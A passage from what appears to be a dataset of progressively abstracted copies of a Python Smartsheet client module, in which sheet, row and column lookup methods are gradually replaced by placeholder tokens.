_row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is 
None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise 
ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, 
Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise 